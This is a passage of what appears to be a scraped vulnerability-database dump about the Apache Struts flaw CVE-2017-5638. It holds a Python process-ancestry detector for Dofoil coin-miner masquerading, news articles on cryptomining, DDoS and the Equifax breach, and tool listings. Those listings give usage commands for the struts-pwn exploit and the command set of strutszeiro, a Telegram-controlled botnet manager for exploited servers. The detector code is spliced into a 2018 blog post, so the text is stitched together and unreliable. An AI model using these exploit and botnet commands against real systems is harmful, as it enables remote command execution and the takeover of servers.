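# Where a real wuauclt.exe lives (assumed default %SystemRoot%).
WUAUCLT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# The Windows Update service host launches it; the shell does not.
WUAUCLT_PARENTS = {"svchost.exe"}


def parse_events(text: str) -> List[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _base(path: str) -> str:
    # ntpath handles Windows separators even when this runs on Linux.
    return ntpath.basename(path).lower()


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Image basenames of every ancestor present in the data, parent first."""
    chain, seen, ev = [], set(), by_pid.get(pid)
    while ev is not None and ev["pid"] not in seen:
        seen.add(ev["pid"])
        ev = by_pid.get(ev["ppid"])
        if ev is not None:
            chain.append(_base(ev["image"]))
    return chain


def detect(events: List[dict]) -> List[dict]:
    by_pid = {e["pid"]: e for e in events}
    alerts: List[dict] = []

    def alert(ev: dict, rule: str, severity: str, detail: str) -> None:
        alerts.append({"pid": ev["pid"], "utc": ev["utc"], "rule": rule,
                       "severity": severity, "detail": detail})

    for ev in events:
        image, parent = _base(ev["image"]), _base(ev["parent_image"])
        if image == "wuauclt.exe":
            suspicious = False
            if ntpath.dirname(ev["image"].lower()) not in WUAUCLT_DIRS:
                alert(ev, "masquerading_wuauclt_path", "high", ev["image"])
                suspicious = True
            if parent not in WUAUCLT_PARENTS:
                alert(ev, "wuauclt_unexpected_parent", "high", "parent=" + parent)
                suspicious = True
            # Dofoil shape: a suspicious "wuauclt.exe" descended from explorer.exe.
            lineage = ancestry(ev["pid"], by_pid)
            if suspicious and "explorer.exe" in lineage:
                alert(ev, "miner_chain", "critical", " <- ".join(lineage))
        elif image == "explorer.exe":
            # The shell normally runs once per session, started by userinit.exe.
            if parent == "explorer.exe":
                alert(ev, "explorer_spawns_explorer", "medium", "ppid=%d" % ev["ppid"])
            # A 32-bit explorer.exe on a 64-bit host is itself unusual.
            if "\\syswow64\\" in ev["image"].lower():
                alert(ev, "wow64_explorer", "medium", ev["image"])
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print("{utc} pid={pid:<5} {severity:8} {rule:26} {detail}".format(**a))
```

On the sample data the legitimate shell (pid 4120) and the real update client (pid 6012) produce nothing, while the two SysWOW64 explorer.exe instances each raise two medium alerts and the AppData "wuauclt.exe" raises the two high alerts plus the critical chain alert that ties them together. In production the same rules would run over Sysmon event ID 1 or an EDR's process telemetry, and the `WUAUCLT_DIRS` set would be derived from the real %SystemRoot% rather than hard-coded.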
\n\nMeanwhile, Malwarebytes Labs [ranks](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) malicious cryptomining as its top detection since September. While acknowledging that malicious cryptomining appears to be far less dangerous to the user than ransomware, Malwarebytes Labs warned that its effects should not be underestimated. \u201cIndeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down,\u201d reads the Malwarebytes Labs post.\n\nOrganizations that have been compromised in recent months include the U.K.\u2019s [Information Commissioner\u2019s Office](<http://www.bbc.com/news/technology-43025788>) (ICO), [U.S. federal courts](<http://fortune.com/2018/02/12/us-courts-coinhive-monero-cryptocurrency-miner/>), [Australian state governments](<https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites>), and the[ LA Times newspaper](<https://nakedsecurity.sophos.com/2018/02/27/unsecured-aws-led-to-cryptojacking-attack-on-la-times/>).\n\nAttack targets have included [vulnerable Jenkins servers](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>), [unsecured Docker containers](<https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack>), [Microsoft Windows systems](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and browsers. 
Hackers have used multiple types of attack vehicles, including [malvertising](<https://threatpost.com/ad-network-circumvents-ad-blocking-tools-to-run-in-browser-cryptojacker-scripts/130161/>), email, malware-laced apps, targeted hits, and exploit kits.\n\nFor example, the coin mining campaign detected by Microsoft\u2019s Windows Defender team this week used variants of the Dofoil/Smoke Loader malware in the form of sophisticated trojans with \u201cadvanced cross-process injection techniques, persistence mechanisms, and evasion methods.\u201d\n\nThe Dofoil trojans attacked Explorer.exe with a \u201cprocess hollowing\u201d code-injection technique that created a new instance of the \u201cc:\\windows\\syswow64\\explorer.exe\u201d process and replaced the legitimate code in its memory with malware, so the process still looked like a normal explorer.exe to casual inspection.\n\n\u201cThe hollowed Explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe,\u201d Microsoft explained. Dofoil uses a customized mining application that can mine different cryptocurrencies. To persist across reboots, Dofoil also modifies the registry, according to Microsoft.\n\nAnd let us not forget good, old physical -- aka, real world -- security breaches. The Associated Press reported that crooks [stole 600 servers](<https://apnews.com/55117fb55a714e909fb9aaf08841a5d6/Bitcoin-heist:-600-powerful-computers-stolen-in-Iceland>) from data centers in Iceland that were being used for cryptomining. The servers, which haven\u2019t been found, are worth $2 million, and were swiped in a series of four heists in December and January. 
So far, 11 people have been arrested in connection with the investigation.\n\n### Memcached servers used for DDoS attacks\n\nLast week, we [reported](<https://blog.qualys.com/news/2018/03/02/apple-in-the-infosec-spotlight-as-github-falls-prey-to-amplified-ddos-attack>) on the troubling trend among hackers of using unprotected Memcached servers to dramatically [amplify the intensity](<https://www.darkreading.com/attacks-breaches/memcached-servers-being-exploited-in-huge-ddos-attacks/d/d-id/1331149?>) of their DDoS attacks. GitHub was on the receiving end of such a DDoS attack last week, which at the time was considered [the most intense ever](<http://www.zdnet.com/article/github-was-hit-with-the-largest-ddos-attack-ever-seen/>).\n\nWell, that record lasted for only a few days. This week, Arbor Networks [detected](<https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/>) an even stronger DDoS attack against an unnamed customer of a U.S.-based service provider. 
The attack, according to Arbor Networks, reached 1.7Tbps at its peak and utilized the same Memcached reflection/amplification attack vector involved in the GitHub attack, which peaked at 1.35Tbps.\n\n_(Source: Arbor Networks)_\n\nThe open source Memcached software is meant to be used behind firewalls on internal networks to boost server performance, but many organizations have left their Memcached servers reachable from the Internet, typically on UDP port 11211, and hackers are using them to significantly boost their DDoS attacks.\n\n\u201cWhile the internet community is coming together to shut down access to the many open Memcached servers out there, the sheer number of servers running Memcached openly will make this a lasting vulnerability that attackers will exploit,\u201d reads Arbor Networks\u2019 blog post.\n\nFor detailed information about this trend, in which attackers abuse the connectionless User Datagram Protocol (UDP), whose source address a sender can forge so that the server\u2019s replies go to the victim, check out the write-ups from [Akamai](<https://blogs.akamai.com/2018/02/memcached-udp-reflection-attacks.html>), [Link11](<https://www.link11.com/en/blog/new-high-volume-vector-memcached-reflection-amplification-attacks/>) and [Cloudflare](<https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/>).\n\n\u201cAn attacker spoofing the UDP address of their intended victim can send just a small packet of data to a Memcached server, tricking it into blasting as much as 50,000 times more data in response,\u201d [wrote](<https://hotforsecurity.bitdefender.com/blog/world-record-broken-again-ddos-attack-exceeds-1-7-terabits-per-second-19653.html#new_tab>) security analyst Graham Cluley. \u201cThe result? A data tsunami.\u201d\n\nIn encouraging news, eWeek [reported on Friday](<http://www.eweek.com/security/memcached-ddos-attacks-slow-down-as-patching-ramps-up>) that patching efforts were starting to make a dent in these amplified DDoS attacks, according to the latest data gathered by Arbor and Cloudflare. 
\"We're still seeing lots of them, but their average size is considerably smaller due to ongoing cleanup and mitigation efforts,\" Steinthor Bjarnason, senior network security analyst at Netscout\u2019s Arbor unit, told eWEEK.\n\n### Another digital forensics vendor claims it can crack iPhones\n\nOn the heels of Cellebrite\u2019s recent claims that it can unlock and extract data from devices running all modern iOS versions including the most recent one, another digital forensics vendor is quietly making similar promises.\n\nForbes [reported](<https://www.forbes.com/sites/thomasbrewster/2018/03/05/apple-iphone-x-graykey-hack/#7b81709b2950>) this week that a \"mysterious\" company called Grayshift is distributing marketing materials for a product called GrayKey, offered in online and offline versions, that it says can unlock devices running iOS 10 and iOS 11, including the latest iPhone X.\n\n_A second digital forensics vendor now claims it can crack iOS devices, including the iPhone X, pictured here. (Photo credit: Apple)_\n\nForbes\u2019 February [report](<https://www.forbes.com/sites/thomasbrewster/2018/02/26/government-can-access-any-apple-iphone-cellebrite/#cb3ce1f667a0>) on Cellebrite\u2019s claims -- which extend to Android devices as well -- generated a lot of concern among privacy and security experts.\n\nCellebrite has been telling its customers, which are primarily government, military and corporate investigative teams, that it\u2019s able to unlock and extract data from devices running iOS 11, such as the iPhone X, as well as other iPhones, iPads and iPods.\n\nConcerns center on the possibility that whatever technique and knowledge Cellebrite -- and now apparently Grayshift -- may possess could fall into the hands of criminals, be independently replicated by bad actors, or be abused by governments.\n\nThe situation also highlights the ongoing tug-of-war between tech vendors and law enforcement agencies, as the former resist watering down encryption on their products, while the latter argue they 
need access to devices and data for their investigations.\n\n### Speaking of law enforcement\u2019s distaste for strong encryption\n\nThis week FBI Director Christopher Wray, speaking at Boston College's second annual cybersecurity summit, reiterated his agency\u2019s opposition to \u201cunbreakable encryption,\u201d saying it creates \u201ca major public safety issue,\u201d according to a[ CSO Magazine report](<https://www.csoonline.com/article/3261100/encryption/fbi-chief-calls-for-public-private-detente-on-encryption.html#tk.rss_all>).\n\nSaying that in fiscal 2017 FBI investigators failed to retrieve the contents of 7,775 devices to which judges had granted them access, Wray \u201cmade an impassioned appeal for help from the tech sector and the security community,\u201d CSO reported.\n\nIn related news, it transpired this week that the FBI has established close collaboration with Best Buy\u2019s Geek Squad team of computer repair technicians. According to[ documents obtained by the Electronic Frontier Foundation (EFF)](<https://www.eff.org/deeplinks/2018/03/geek-squads-relationship-fbi-cozier-we-thought>), the FBI has been paying Geek Squad staffers for years for tips about illegal material they may find in the computers they\u2019re fixing.\n\n### Data breach included with your meal, your video game and your credit report\n\n\n\nThe Applebee\u2019s restaurant chain recently [discovered](<https://www.rmhfranchise.com/dataincident/>) malware in the POS (point of sale) systems of more than 160 of its eateries. 
At risk: Customers\u2019 names, credit and debit card numbers, expiration dates and card verification codes.\n\nThe incidents occurred in recent months, going back to November of last year, but Applebee\u2019s didn\u2019t discover the issue until mid-February.\n\n \n\n\u201cWe\u2019re seeing more of these types of breaches happening\u2026 it\u2019s an industry wide problem as more retailers look to an ecosystem of providers to bring in third party systems like point of sale and inventory management solutions,\u201d Fred Kneip, CEO of security firm CyberGRX [told Threatpost](<https://threatpost.com/pos-malware-found-at-160-applebees-restaurant-locations/130281/>). \u201cAs of today a lot of stores are playing catch up with security, and it can take months or years to realize that compromises have happened on third party systems.\u201d\n\nMeanwhile, customers of games developer Nippon Ichi Software (NIS) America are also at risk for credit card fraud and ID theft, after two of its online stores -- [NIS America](<https://store.nisamerica.com/>) and [SNKonlinestore](<https://snkonlinestore.com/>) -- were hacked.\n\n\n\nThe breach occurred on Jan. 23 and wasn\u2019t discovered until Feb. 26. 
Compromised data included customer name, address, credit card number, expiration date, security code, and email address.\n\nAccording to the email NIS America sent to customers -- as [re-printed by Nintendo Life](<http://www.nintendolife.com/news/2018/03/nis_americas_online_stores_hacked_credit_card_details_compromised>) -- customers were redirected to an external web page where their information was captured, before being sent back to the company\u2019s online store to complete the transaction.\n\nAnd in the latest chapter of the monster data breach that just keeps on giving, Equifax [disclosed](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) that there are another 2.4 million Americans whose personal data was stolen by hackers in last year\u2019s infamous and massive hack. That ups the total of people affected to about 148 million. The data thieves accessed Equifax\u2019s systems and data by exploiting the Apache Struts CVE-2017-5638 vulnerability, for which a patch had been available since March 2017, about two months before the intrusion began.\n\n### In other InfoSec news \u2026\n\n * Duo Security, which provides a two-factor authentication app, is detailing a [serious flaw](<https://duo.com/labs/psa/duo-psa-2017-003>) it recently fixed in its product as well as [the flaw\u2019s root cause](<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations>) -- a weakness in how several SAML libraries handle XML comments inside signed assertions, which can let an authenticated user be treated as a different one -- which also affects third-party products and services. 
\u201cDuo disclosed the problem responsibly late last year, and after giving vendors \u2013 including itself \u2013 time to fix the bug, has now gone public with an excellent and educational explanation of what went wrong,\u201d [writes](<https://nakedsecurity.sophos.com/2018/02/28/single-sign-on-authentication-the-bug-that-let-you-logon-as-someone-else/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29>) Lisa Vaas in Sophos\u2019 Naked Security blog.\n * Facebook\u2019s Oculus Rift VR headsets temporarily stopped working after the company [let its security certificate lapse](<https://www.theverge.com/2018/3/8/17095414/oculus-rift-software-fix-certificate-expiry>).\n * MoviePass CEO Mitch Lowe set off privacy alarms when he [boasted](<https://www.csoonline.com/article/3260629/privacy/thanks-to-moviepass-app-tracking-ceo-claims-we-know-all-about-you.html>) this week during a keynote address that his company\u2019s eponymous app has such an ability to track its subscribers -- including via GPS data -- that \u201cwe know all about you.\u201d After the inevitable backlash, the company [the next day](<https://www.theverge.com/2018/3/8/17096442/moviepass-updates-ios-app-unused-location-tracking-features>) announced it was removing the app\u2019s location tracking features.\n\n* * *\n\n_With the [Qualys Cloud Platform ](<https://www.qualys.com/cloud-platform/>)and its suite of natively integrated, self-updating security and compliance [Cloud Apps](<https://www.qualys.com/apps/>), Qualys pro__vides automated, continuous and scalable prevention and response__. 
__Qualys offers customers [complete and instant visibility of IT assets](<https://www.qualys.com/apps/asset-inventory/>) wherever they reside -- on premises, in clouds, and remote endpoints; comprehensive and continuous [vulnerability management](<https://www.qualys.com/apps/vulnerability-management/>); granular [assessment of secure system configurations](<https://www.qualys.com/apps/policy-compliance/>); [monitoring of file integrity](<https://www.qualys.com/apps/file-integrity-monitoring/>); [web application scanning and firewall](<https://www.qualys.com/apps/web-app-scanning/>); [detection of compromise](<https://www.qualys.com/apps/indication-of-compromise/>); and multiple other security and compliance solutions._", "cvss3": {}, "published": "2018-03-09T21:45:09", "type": "qualysblog", "title": "Cryptomining is all the rage among hackers, as DDoS amplification attacks continue", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-09T21:45:09", "id": "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "href": "https://blog.qualys.com/news/2018/03/09/cryptomining-is-all-the-rage-among-hackers-as-ddos-amplification-attacks-grow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "krebs": [{"lastseen": "2017-09-17T17:56:36", "description": "**Visa** and **MasterCard** are sending confidential alerts to financial institutions across the United States this week, warning them about more than 200,000 credit cards that were stolen in the epic data breach announced last week at big-three credit bureau **Equifax**. At first glance, the private notices obtained by KrebsOnSecurity appear to suggest that hackers initially breached Equifax starting in November 2016. 
But Equifax says the accounts were all stolen at the same time -- when hackers accessed the company's systems in mid-May 2017.\n\n\n\nBoth Visa and MasterCard frequently send alerts to card-issuing financial institutions with information about specific credit and debit cards that may have been compromised in a recent breach. But it is unusual for these alerts to state from which company the accounts were thought to have been pilfered.\n\nIn this case, however, Visa and MasterCard were unambiguous, referring to Equifax specifically as the source of an e-commerce card breach.\n\nIn a non-public alert sent this week to sources at multiple banks, Visa said the \"window of exposure\" for the cards stolen in the Equifax breach was between Nov. 10, 2016 and July 6, 2017. A similar alert from MasterCard included the same date range.\n\n\"The investigation is ongoing and this information may be amended as new details arise,\" Visa said in its confidential alert, linking to the press release Equifax initially posted about the breach on Sept. 7, 2017.\n\nThe card giant said the data elements stolen included card account number, expiration date, and the cardholder's name. Fraudsters can use this information to conduct e-commerce fraud at online merchants.\n\nIt would be tempting to conclude from these alerts that the card breach at Equifax dates back to November 2016, and that perhaps the intruders then managed to install software capable of capturing customer credit card data in real-time as it was entered on one of Equifax's Web sites.\n\nIndeed, that was my initial hunch in deciding to report out this story. But according to a statement from Equifax, the hacker(s) downloaded the data in one fell swoop in mid-May 2017.\n\n\u201cThe attacker accessed a storage table that contained historical credit card transaction related information,\" the company said. \"The dates that you provided in your e-mail appear to be the transaction dates. 
We have found no evidence during our investigation to indicate the presence of card harvesting malware, or access to the table before mid-May 2017.\u201d\n\nEquifax did not respond to questions about how it was storing credit card data, or why only card data collected from customers after November 2016 was stolen.\n\nIn its [initial breach disclosure](<https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628>) on Sept. 7, Equifax said it discovered the intrusion on July 29, 2017. The company said the hackers broke in through a vulnerability in the software that powers some of its Web-facing applications.\n\nIn [an update to its breach disclosure](<https://www.equifaxsecurity2017.com/>) published Wednesday evening, Equifax confirmed reports that the application flaw in question was a weakness disclosed in March 2017 in a popular open-source software package called **Apache Struts **([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>))**. **\n\n\"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted,\" the company wrote. \"We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nThe Apache flaw was [first spotted around March 7, 2017](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), when security firms began warning that attackers were actively exploiting a \"zero-day\" vulnerability in Apache Struts. 
Zero-days refer to software or hardware flaws that hackers find and figure out how to use for commercial or personal gain before the vendor even knows about the bugs.\n\nBy March 8, Apache had released new versions of the software to mitigate the vulnerability. But by that time exploit code that would allow anyone to take advantage of the flaw was already published online -- making it a race between companies needing to patch their Web servers and hackers trying to exploit the hole before it was closed.\n\nScreen shots apparently taken on March 10, 2017 and later posted to the vulnerability tracking site xss[dot]cx indicate that the Apache Struts vulnerability [was present at the time on annualcreditreport.com](<http://xss.cx/2017/03/12/txt/cve-2017-5638-annualcreditreportcom-exploit-poc-content-type-http-header-example.html>) -- the only web site mandated by Congress where all Americans can go to obtain a free copy of their credit reports from each of the three major bureaus annually.\n\nIn [another screen shot](<http://xss.cx/2017/03/12/txt/cve-2017-5638-consumerexperianin-exploit-poc-content-type-http-header-example.html>) apparently made that same day and uploaded to xss[dot]cx, we can see evidence that the Apache Struts flaw also was present in Experian's Web properties.\n\nEquifax has said the unauthorized access occurred from mid-May through July 2017, suggesting either that the company's Web applications were still unpatched in mid-May or that the attackers broke in earlier but did not immediately abuse their access.\n\nIt remains unclear when exactly Equifax managed to fully eliminate the Apache Struts flaw from their various Web server applications. But one thing we do know for sure: The hacker(s) got in before Equifax closed the hole, and their presence wasn't discovered until July 29, 2017.\n\n**Update, Sept. 15, 12:31 p.m. ET:** Visa has updated their advisory about these 200,000+ credit cards stolen in the Equifax breach. 
Visa now says it believes the records also included the cardholder's Social Security number and address, suggesting that (ironically enough) the accounts were stolen from people who were signing up for credit monitoring services through Equifax.\n\nEquifax also clarified the breach timeline to note that it patched the Apache Struts flaw in its Web applications only after taking the hacked system(s) offline on July 30, 2017. Which means Equifax left its systems unpatched for more than four months after a patch (and exploit code to attack the flaw) was publicly available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-14T18:03:12", "type": "krebs", "title": "Equifax Hackers Stole 200k Credit Card Accounts in One Fell Swoop", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-14T18:03:12", "id": "KREBS:EE70929DE902D9B233E209B73C1AD4A0", "href": "https://krebsonsecurity.com/2017/09/equifax-hackers-stole-200k-credit-card-accounts-in-one-fell-swoop/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": 
"2023-12-06T17:02:20", "description": "[](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. 
\n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:02:20", "description": "[](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n 
\n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": 
"http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:37:47", "description": "[](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n**Usage:** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "cvss3": {}, "published": "2017-03-17T14:22:00", "type": "kitploit", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "canvas": [{"lastseen": "2021-07-28T14:33:33", "description": "**Name**| struts_ognl \n---|--- \n**CVE**| CVE-2017-5638 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| struts_ognl \n**Notes**| CVE Name: CVE-2017-5638 \nVENDOR: Apache \nNOTES: \nThe JAR Server will listen on the port provided in the UI. However, if that port is unavailable, \na random one will be chosen. \n \nExample vulnerable application: struts2-showcase in Struts 2.3.31 . 
\nExample URL: http://172.16.196.137:8080/struts2-showcase/showcase.action \n \nVersions tested: \n \n> Ubuntu Linux 14.04.3 \nJava 7u22/Tomcat 8.5.11/Struts 2.3.31 \n \nRepeatability: One shot \nReferences: ['http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/', 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html', 'https://github.com/tengzhangchao/Struts2_045-Poc'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "canvas", "title": "Immunity Canvas: STRUTS_OGNL", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-11T02:59:00", "id": "STRUTS_OGNL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/struts_ognl", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability 
